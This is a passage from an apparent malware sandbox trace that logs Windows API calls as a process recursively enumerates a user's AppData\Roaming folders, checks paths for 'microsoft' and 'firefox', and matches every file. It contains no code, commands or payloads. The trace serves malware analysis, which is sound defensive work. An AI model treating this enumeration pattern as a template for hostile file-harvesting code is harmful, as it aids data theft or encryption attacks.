FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.596] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.596] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned 0 [0083.596] GetNamedSecurityInfoW () returned 0x0 [0083.597] LocalFree (hMem=0x572028) returned 0x0 [0083.597] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="microsoft") returned 0x0 [0083.597] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", lpSrch="firefox") returned 0x0 [0083.597] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.597] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.597] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.597] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.597] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.597] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned 1 [0083.597] GetNamedSecurityInfoW () returned 0x0 [0083.597] LocalFree (hMem=0x571fe8) returned 0x0 [0083.597] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="microsoft") returned 0x0 [0083.597] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", lpSrch="firefox") returned 0x0 [0083.597] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.597] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.597] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.597] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.597] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.597] Sleep (dwMilliseconds=0x0) [0083.597] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.597] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.597] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 0 [0083.598] GetNamedSecurityInfoW () returned 0x0 [0083.598] LocalFree (hMem=0x572028) returned 0x0 [0083.598] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="microsoft") returned 0x0 [0083.598] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", lpSrch="firefox") returned="Firefox" [0083.598] Sleep (dwMilliseconds=0x0) [0083.598] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.598] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.598] Sleep (dwMilliseconds=0x0) [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.598] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Skype" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype" [0083.598] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype") returned 0 [0083.598] GetNamedSecurityInfoW () returned 0x0 [0083.598] LocalFree (hMem=0x571fe8) returned 0x0 [0083.598] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="microsoft") returned 0x0 [0083.598] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", lpSrch="firefox") returned 0x0 [0083.598] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*" [0083.598] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.599] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.599] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype", pszFile="RootTools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools" [0083.599] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools") returned 0 [0083.599] GetNamedSecurityInfoW () returned 0x0 [0083.599] LocalFree (hMem=0x572028) returned 0x0 [0083.599] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="microsoft") returned 0x0 [0083.599] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", lpSrch="firefox") returned 0x0 [0083.599] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*" [0083.599] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586ba0 [0083.599] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.599] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.599] Sleep (dwMilliseconds=0x0) [0083.599] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0 [0083.599] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.599] Sleep (dwMilliseconds=0x0) [0083.599] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.599] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0 [0083.599] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.599] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.599] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 0x586b20 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.pptx", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="83D2u8nDKooEEZ.avi", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="9cIv.mp3", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.ppt", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="a3ZfsA3.bmp", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathMatchSpecW (pszFile="a6-2v.swf", pszSpec="*") returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.600] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.600] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.600] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.600] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.600] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.600] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.600] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.600] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.600] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.600] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.600] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.600] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.600] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.600] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.600] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.600] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.600] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.600] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.601] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.601] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.601] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.601] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.601] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.601] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.601] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] PathMatchSpecW (pszFile="glob.js", pszSpec="*") returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] PathMatchSpecW (pszFile="glob.settings.js", pszSpec="*") returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.601] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.601] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.601] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.601] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*") returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.601] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.601] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.601] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.601] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.601] PathMatchSpecW (pszFile="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", pszSpec="*") returned 1 [0083.601] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.602] PathMatchSpecW (pszFile="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", pszSpec="*") returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.602] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.602] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.602] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.602] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.602] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.602] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.602] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.602] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.602] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.602] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.602] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.602] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.602] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.602] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.602] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.602] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.602] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.602] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.602] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.603] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.603] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.603] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.603] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0083.603] 